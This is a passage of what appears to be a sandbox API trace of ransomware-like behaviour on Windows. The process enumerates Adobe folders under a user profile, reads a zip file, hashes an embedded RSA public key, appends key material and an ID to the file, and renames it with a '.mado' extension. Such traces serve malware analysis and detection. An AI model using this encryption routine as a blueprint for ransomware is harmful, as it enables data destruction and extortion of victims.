out: lpMsg=0x39cff08) returned 0 [0206.542] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.542] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0206.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0206.542] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0206.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0206.542] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0206.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.542] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0206.542] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87178 [0206.543] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0206.543] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.543] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.543] PathFindFileNameW (pszPath="") returned="" [0206.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.545] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.545] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0206.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0206.545] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0206.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.546] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=42495) returned 1 [0206.546] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.548] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa5d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.548] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.559] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa5ff, lpOverlapped=0x0) returned 1 [0206.561] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.561] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.561] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.561] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0206.562] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.562] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.562] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.562] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.562] GetLastError () returned 0x0 [0206.562] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.562] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0206.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.562] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.562] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.562] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa600) returned 0x3b87c98 [0206.562] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87178 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c68 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b871c0 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c80 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cb0 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.563] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cb0 | out: hHeap=0x2c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79cc8 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79cb0 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b818d8 [0206.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b819f0 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818d8 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cb0 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.564] GetCurrentThreadId () returned 0x600 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67078 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b0b8 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67498 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.564] GetCurrentThreadId () returned 0x600 [0206.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67390 [0206.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67288 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.566] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa5ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.566] WriteFile (in: hFile=0x63c, lpBuffer=0x3b67078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b67078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0206.566] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.566] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.566] CloseHandle (hObject=0x63c) returned 1 [0206.568] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.mado")) returned 1 [0206.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.568] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.570] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0206.570] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0206.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0206.570] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0206.570] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0206.570] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef4b8 | out: hHeap=0x2c0000) returned 1 [0206.570] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.570] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0206.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0206.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0206.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.570] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.571] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.571] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0206.571] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.571] PathFindFileNameW (pszPath="") returned="" [0206.571] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0206.572] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.572] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0206.572] FindNextFileW (in: hFindFile=0x32ef1f8, 